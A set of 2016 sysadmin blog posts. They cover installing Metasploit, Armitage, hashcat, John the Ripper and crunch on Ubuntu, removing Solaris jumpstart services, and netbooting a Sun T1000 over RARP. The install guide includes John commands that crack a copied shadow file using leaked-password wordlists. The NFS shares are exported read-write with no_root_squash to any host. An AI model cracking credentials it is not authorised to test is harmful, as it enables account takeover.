0 0 0g 0:00:00:03 57.52% 1/3 (ETA: 15:30:49) 0g/s 191006p/s 191006c/s 191006C/s GPU:77°C GPU1:81°C administrator10..A3212
2 1 0g 0:00:00:02 74.16% 1/3 (ETA: 15:27:49) 0g/s 194691p/s 194691c/s 194691C/s GPU:78°C a5668..admior5632
4 4 0g 0:00:00:06 99.38% 1/3 (ETA: 15:26:34) 0g/s 50777p/s 50777c/s 50777C/s GPU:87°C administr3..a971905
8 5 0g 0:00:00:03 58.41% 1/3 (ETA: 15:25:17) 0g/s 25871p/s 25871c/s 25871C/s GPU:79°C 5505..A9691
16 5 0g 0:00:00:10 51.33% 1/3 (ETA: 15:24:10) 0g/s 3556p/s 3556c/s 3556C/s GPU:80°C A-214..Administrtor214
Tuesday, October 11, 2016
soup to nuts install of metasploit on ubuntu 14.04 lts
..........
install base
* priv
passwd
nano -w /etc/ssh/sshd_config
ssh-keygen -t rsa -b 2048
apt-get update
apt-get upgrade
apt-get install build-essential libreadline-dev libssl-dev libpq5 \
libpq-dev libreadline5 libsqlite3-dev libpcap-dev openjdk-7-jre \
git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev \
libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev ipmitool p7zip \
nmap tcpdump subversion cmake bison flex
..........
rbenv
* non-priv
cd ~
git clone git://github.com/sstephenson/rbenv.git .rbenv
echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(rbenv init -)"' >> ~/.bashrc
exec $SHELL
git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc
git clone git://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo
exec $SHELL
rbenv install 2.3.1
rbenv global 2.3.1
ruby -v
..........
postgre sql server
* non-priv
sudo -s
su postgres
cd ~
createuser msf -P -S -R -D
createdb -O msf msf
exit
exit
..........
hashcat (not a hot idea on a virtual machine)
* as priv user
sudo apt-get install ocl-icd-libopencl1 opencl-headers clinfo
sudo mkdir /usr/bin/OpenCL
cd /opt
wget https://hashcat.net/files/hashcat-3.10.7z
p7zip -d hashcat-3.10.7z
mv hashcat-3.10/ hashcat
cd hashcat
cp hashcat64.bin /usr/bin
ln -s /usr/bin/hashcat64.bin /usr/bin/hashcat
..........
john
* as priv user
apt-get install build-essential libssl-dev yasm libgmp-dev \
libpcap-dev libnss3-dev libkrb5-dev pkg-config libbz2-dev
add to the above as needed:
nvidia-cuda-toolkit nvidia-opencl-dev nvidia-352 opencl-headers <- if you have an nvidia gpu
fglrx-updates-dev <- if you want to use your amd gpu as an opencl device
libopenmpi-dev openmpi-bin <- for mpi support
* a gpu note
lshw -C video
rexgen
apt-get install libboost-regex1.54-dev <- meh
svn checkout https://github.com/teeshop/rexgen.git rexgen
cd rexgen/trunk/src/
mkdir build && cd build
cmake ..
make && sudo make install
ldconfig
git clone git://github.com/magnumripper/JohnTheRipper -b bleeding-jumbo john
cd john/src
./configure --enable-mpi --enable-nt-full-unicode && make -s clean && make -sj4
* because unicode, yes.
./configure --enable-cuda --enable-mpi --enable-nt-full-unicode \
--enable-experimental-code && make -s clean && make -sj4
* if gpu
cd .. && mv run /opt/john
** test gpu
john --list=cuda-devices
john --list=opencl-devices
let's get some password lists
cd /opt/john
mkdir /opt/john/dictionaries
cd /opt/john/dictionaries
cp ../wordlist.lst .
wget http://download.openwall.net/pub/wordlists/all.gz
wget https://download.g0tmi1k.com/wordlists/large/crackstation-human-only.txt.gz
* nb crackstation may show up as a binary file. i'd suggest after extraction:
strings crackstation-human-only.txt > crackstation.txt
fix the environment
edit:
/etc/environment
add /opt/john to PATH
add line JOHN="/opt/john/"
** odds and sods
john --list=formats --format=opencl
john --list=formats --format=cuda
john ~/shadow <- openmp crack session
john --format=sha512crypt-opencl ~/shadow <- opencl session
john --format=sha512crypt-cuda ~/shadow <- cuda session
** add'l chr files
wget https://www.korelogic.com/Resources/Tools/rockyou.chr
wget https://www.korelogic.com/Resources/Tools/rockyou-lanman.chr
* nb http://contest-2010.korelogic.com/rules.html
..........
crunch
* priv user
wget https://sourceforge.net/projects/crunch-wordlist/files/latest/download -O crunch-3.6.tgz
tar xvfz crunch-3.6.tgz
cd crunch-3.6 <- into the extracted directory
make
make install
..........
metasploitframework
* non-priv
cd /opt
sudo git clone https://github.com/rapid7/metasploit-framework.git
sudo chown -R `whoami` /opt/metasploit-framework
cd metasploit-framework
gem install bundler
bundle install
sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'
..........
armitage (metasploit gui)
* priv
curl -# -o /tmp/armitage.tgz http://www.fastandeasyhacking.com/download/armitage150813.tgz
sudo tar -xvzf /tmp/armitage.tgz -C /opt
sudo ln -s /opt/armitage/armitage /usr/local/bin/armitage
sudo ln -s /opt/armitage/teamserver /usr/local/bin/teamserver
sudo sh -c "echo java -jar /opt/armitage/armitage.jar \$\* > /opt/armitage/armitage"
sudo perl -pi -e 's/armitage.jar/\/opt\/armitage\/armitage.jar/g' /opt/armitage/teamserver
sudo nano /opt/metasploit-framework/config/database.yml
production:
adapter: postgresql
database: msf
username: msf
password:
host: 127.0.0.1
port: 5432
pool: 75
timeout: 5
sudo sh -c "echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/config/database.yml >> /etc/profile"
source /etc/profile
..........
run it
* non-priv
msfconsole
Thursday, October 6, 2016
remove solaris 8 jumpstart services from a solaris 8 jumpstart server
yucky gross solaris 8 jumpstart server begone!
# grep -v "^#" /etc/inetd.conf <- shows what is defined.
hashed finger, tftp, &c in /etc/inetd.conf
# pkill -HUP inetd
bash-2.03# rm /etc/ethers
bash-2.03# rm /etc/bootparams
bash-2.03# rm -rf /tftpboot
bash-2.03# rm -rf /jumpstart
# ptree
to determine if bootparamd is forked (saw entries in rpcinfo -p)
443 /usr/sbin/rpc.bootparamd
441 /usr/sbin/in.rarpd -a
looked for rarp in /etc/rc2.d ... then all of /etc
# find . -type f -exec grep -l "rarp" {} +
found it... "*nfs.server"
hashed out rarpd & bootparamd lines
# If /tftpboot exists become a boot server
# if [ -d /tftpboot ]; then
# /usr/sbin/in.rarpd -a
# /usr/sbin/rpc.bootparamd
# fi
Monday, October 3, 2016
netboot solaris 10 via ubuntu 14 using RARP
I did something bad and my Sun T1000 decided to stop booting due to the most
recent patchset.
Luckily ALOM was installed and I could ssh in and see:
Cross trap sync timeout: at cpu_sync.xword[1]: 0x1010
Flow across the console.
This is firmware issue as:
sc> showhost
SPARC-Enterprise-T1000 System Firmware 6.3.10 2007/12/08 15:48
Host flash versions:
Hypervisor 1.3.4 2007/03/28 06:03
OBP 4.25.11 2007/12/07 23:44
POST 4.25.11 2007/12/08 00:10
The patchset is for 6.4. Of course.
Happily, the T1000 lacks an optical drive or any means of connecting one.
No USB either. Great.
The next option was to do a network boot. Oh boy.
I didn't feel like messing with my production Solaris systems, so I installed Ubuntu 14
with all the prereqs for an old-style Jumpstart server:
* TFTP
* Bootparamd
* NFSv4
* RARP
* Solaris 10 SPARC DVD (here: /opt/sol-10-u9-sparc.iso)
* Solaris Firmware 6.7.13 patch 139435-10 (here: /opt/solaris10.patches/139435-10.zip)
The reason why I am doing RARP is due to the fact that my network already
has a DHCPvM$ server.
RARP uses reverse ARP to receive its IP address. So, by sending out RARP packets, my
Solaris system is able to get an address and not rely on DHCP. Neat? Yeah.
My systems for this exercise are:
netboot     10.97.32.186
hostnix01   10.97.32.166   0A6120A6 (IP as hex)   00:14:4f:e5:f7:9a (MAC)
..........................................
netboot
..........................................
packages:
# apt-get install rarpd tftpd-hpa bootparamd nfs-kernel-server
rarpd:
# vi /etc/default/rarpd
Change the last line to match the tftpd-hpa directory and the NIC name:
OPTS="-v -b /var/lib/tftpboot/ eth0"
iso mount:
# mount -o loop /opt/sol-10-u9-sparc.iso /media/solaris10/
nfsd:
# mkdir -p /media/solaris10
# mkdir -p /opt/solaris10.patches
Define a share in NFS for this mount point as this mount will be used to serve
the patches. Open the following file:
# vi /etc/exports
Add the following entries:
/media/solaris10/ *(insecure,rw,no_root_squash,no_subtree_check,sync)
/opt/solaris10.patches/ *(insecure,rw,no_root_squash,no_subtree_check,sync)
bootparamd:
# vi /etc/bootparams
sunfire root=netboot:/media/solaris10/Solaris_10/Tools/Boot install=netboot:/media/solaris10 boottype=:in
per URL: Some explanation for the above: This defines which host gets the specified
NFS share. NFS4 uses relative pathnames, but I am not using this, so therefore I’ve
specified the absolute path. Note that server: is the hostname of the server running
the NFS service and was mentioned in my post earlier as my server is originally named
"netboot". The name used is the hostname of your server, substitute it to the correct name.
rarpd:
# vi /etc/hosts
Add the following entry:
10.97.32.166 hostnix01
Create the ethers file:
vi /etc/ethers
Add the following entry:
00:14:4f:e5:f7:9a hostnix01
per URL: Replace the MAC address with the MAC of your Sun server. You can change the
hostname as well, but it needs to be the same everywhere!
tftpd:
vi /etc/default/tftpd-hpa
Change the TFTP_ADDRESS line to the following:
TFTP_ADDRESS=":69"
per URL: The configuration of the server is now complete. One last step we need to do is
to copy the netboot kernel for the Sun server. This resides on the mounted Solaris
install image. By default OpenBoot will look for a kernel using TFTP when using network
boot. Based on its IP-address it will look for a matching HEX filename. We can find out
which filename that would be by running the following:
# printf "%02X%02X%02X%02X" 10 97 32 166
This will result in the following (for my IP-address):
0A6120A6
The above will be the netboot kernel filename for the Sun server. Place the netboot kernel in place:
# cp /media/solaris10/Solaris_10/Tools/Boot/platform/sun4u/inetboot /var/lib/tftpboot/0A6120A6
restart the services in order
service tftpd-hpa restart
service bootparamd restart
service nfs-kernel-server restart
service rarpd restart
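The four files just edited have to agree with each other (the same hostname in hosts, ethers and bootparams; a tftpboot filename derived from the client IP), and a stale value carried over from a copied recipe silently breaks the boot. As an added example (not from the original post or the linked one), here is a checker that parses those files as strings and reports the mismatches; the sample configuration is constructed and deliberately carries a bootparams entry for the wrong hostname and a tftpboot file named for a different IP.

```python
#!/usr/bin/env python3
"""Consistency check for a RARP/bootparams/tftp netboot setup.

Added example, not from the original post. It reads the configuration the
post edits (/etc/hosts, /etc/ethers, /etc/bootparams and the tftpboot
directory listing) as strings and reports what would stop `boot net:rarp`.
The sample data below is constructed.
"""
import re

def ip_to_tftp_name(ip):
    """OpenBoot asks TFTP for the client's IPv4 address as 8 upper-case hex digits."""
    octets = [int(o) for o in ip.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError("bad IPv4 address: %r" % ip)
    return "%02X%02X%02X%02X" % tuple(octets)

def parse_hosts(text):
    """/etc/hosts -> {hostname: ip}; comments stripped, aliases included."""
    hosts = {}
    for line in text.splitlines():
        parts = line.split("#", 1)[0].split()
        if len(parts) >= 2:
            for name in parts[1:]:
                hosts[name] = parts[0]
    return hosts

def parse_ethers(text):
    """/etc/ethers -> {hostname: mac}, MAC normalised to lower case."""
    ethers = {}
    for line in text.splitlines():
        parts = line.split("#", 1)[0].split()
        if len(parts) == 2:
            ethers[parts[1]] = parts[0].lower()
    return ethers

def parse_bootparams(text):
    """/etc/bootparams -> {client: {key: value}} for 'client key=value ...' lines."""
    params = {}
    for line in text.splitlines():
        parts = line.split("#", 1)[0].split()
        if len(parts) >= 2:
            params[parts[0]] = dict(p.split("=", 1) for p in parts[1:] if "=" in p)
    return params

def check_client(client, hosts, ethers, bootparams, tftp_files):
    """Return the list of problems that would stop a network boot for client."""
    problems = []
    ip = hosts.get(client)
    if ip is None:
        problems.append("%s has no /etc/hosts entry" % client)
    mac = ethers.get(client)
    if mac is None:
        problems.append("%s has no /etc/ethers entry, rarpd cannot answer it" % client)
    elif not re.fullmatch(r"([0-9a-f]{1,2}:){5}[0-9a-f]{1,2}", mac):
        problems.append("%s: malformed MAC %r in /etc/ethers" % (client, mac))
    if client not in bootparams:
        problems.append("%s has no /etc/bootparams entry (have: %s)"
                        % (client, ", ".join(sorted(bootparams)) or "none"))
    else:
        for key in ("root", "install"):
            if key not in bootparams[client]:
                problems.append("%s: bootparams lacks %s=" % (client, key))
    if ip is not None:
        want = ip_to_tftp_name(ip)
        if want not in tftp_files:
            problems.append("tftpboot lacks %s for %s (found: %s)"
                            % (want, ip, ", ".join(sorted(tftp_files)) or "none"))
    return problems

# constructed sample: a netboot server half-configured with values copied from elsewhere
HOSTS = "127.0.0.1 localhost\n10.97.32.186 netboot\n10.97.32.166 hostnix01\n"
ETHERS = "00:14:4f:e5:f7:9a hostnix01\n"
BOOTPARAMS = ("sunfire root=netboot:/media/solaris10/Solaris_10/Tools/Boot "
              "install=netboot:/media/solaris10 boottype=:in\n")
TFTP_FILES = {"C0A800E6"}   # stale filename computed for a different IP

if __name__ == "__main__":
    for p in check_client("hostnix01", parse_hosts(HOSTS), parse_ethers(ETHERS),
                          parse_bootparams(BOOTPARAMS), TFTP_FILES):
        print("PROBLEM:", p)
```

Run it against the real files with `open(...).read()` in place of the sample strings and `set(os.listdir("/var/lib/tftpboot"))` for the tftp listing; an empty list means the server side is consistent and the remaining suspects are the services themselves.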
..........................................
hostnix01
..........................................
# ssh admin@hostnix01-alom (remote management shell)
sc> poweron
sc> console -f
When you see mac address, get into openboot
#.
sc> break -y
Switch back to console and netboot the kernel
sc> console -f
ok > boot net:rarp -avs
* https://docs.oracle.com/cd/E19455-01/805-7228/hbsparcboot-60/index.html
* interactive, verbose, single user mode (does not include install flag)
After waiting next to forever...
# mkdir /tmp/mount
# mount -F nfs 10.97.32.186:/opt/solaris10.patches /tmp/mount
# cd /tmp/mount
# unzip 139435-10.zip
# cd 139435-10
# ./sysfwdownload /pwd/patch.bin
Run patching command via sysfwdownload. If you see:
"sysfwdownload: file could not be opened"
that means the installer requires the full path; e.g.:
/tmp/mount/139435-10/Firmware/SPARC_Enterprise_T1000/Sun_System_Firmware-6_7_13-SPARC_Enterprise_T1000.bin
# ./sysfwdownload Sun_System_Firmware-6_7_13-SPARC_Enterprise_T1000.bin
.......... (10%).......... (20%).......... (30%).......... (41%)..........
(51%).......... (61%).......... (71%).......... (82%).......... (92%)........ (100%)
Download completed successfully
# init 0
Now you should be back at the 'ok' prompt. Now on the ALOM:
sc> poweroff
SC Alert: SC Request to Power Off Host.
SC Alert: Host system has shut down.
sc> setkeyswitch -y normal
sc> flashupdate -s 127.0.0.1
sc> resetsc
Your ssh console will be terminated due to a broken pipe.
ssh back in and issue:
sc> poweron
sc> console -f
And you're back!
verify:
SPARC Enterprise T1000, No Keyboard
Copyright (c) 1998, 2013, Oracle and/or its affiliates. All rights reserved.
OpenBoot 4.30.4.e, 3968 MB memory available, Serial #82179994.
Ethernet address 0:14:4f:e5:f7:9a, Host ID: 84e5f79a.
Boot device: disk File and args:
ufs-file-system
Loading: /platform/SUNW,SPARC-Enterprise-T1000/boot_archive
ramdisk-root hsfs-file-system
Loading: /platform/SUNW,SPARC-Enterprise-T1000/kernel/sparcv9/unix
SunOS Release 5.10 Version Generic_150400-38 64-bit
Copyright (c) 1983, 2016, Oracle and/or its affiliates. All rights reserved.
os-io WARNING: failed to resolve 'scsa,probe' driver alias, defaulting to 'nulldriver'
WARNING: failed to resolve 'scsa,nodev' driver alias, defaulting to 'nulldriver'
Hostname: hostnix01
Configuring devices.
LDAP NIS domain name is
No panics. Yay!
#.
sc> showhost
SPARC-Enterprise-T1000 System Firmware 6.7.13 2013/09/24 08:10
Host flash versions:
OBP 4.30.4.e 2013/09/23 16:06
Hypervisor 1.7.3.d 2013/09/24 07:19
POST 4.30.4.b 2010/07/09 14:25
All is as it should be.
....
some of this was lifted from here:
https://www.arm-blog.com/installing-solaris-10-on-a-sunfire-v210-via-network/